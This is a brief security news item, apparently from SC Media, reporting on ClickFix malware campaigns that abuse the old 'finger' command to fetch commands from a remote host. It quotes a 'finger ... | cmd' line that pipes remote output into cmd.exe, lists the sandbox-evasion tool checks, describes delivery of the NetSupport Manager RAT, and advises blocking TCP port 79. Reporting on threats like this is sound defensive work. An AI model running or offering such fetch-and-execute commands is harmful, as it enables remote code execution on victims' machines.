BleepingComputer reports that threat actors have revived the abuse of the decades-old "finger" command to facilitate remote command execution as part of new ClickFix malware attacks.After identifying a batch file that exploited the "finger [email protected][.]com" command to fetch commands that were then executed via cmd.exe, MalwareHunterTeam discovered a ClickFix campaign that harnessed the "finger [email protected] | cmd" command to execute commands akin to another campaign reported by a Reddit user.Despite the similarities, the intrusion spotted by MalwareHunterTeam was noted to be more sophisticated due to the presence of commands that sought for malware research tools, including WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere.Absence of any malware analysis tools then prompts the loading of a PDF-spoofing ZIP archive, where the NetSupport Manager RAT package is extracted. Effectively combating the exploitation of the finger command requires the blocking of outgoing traffic to TCP port 79.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds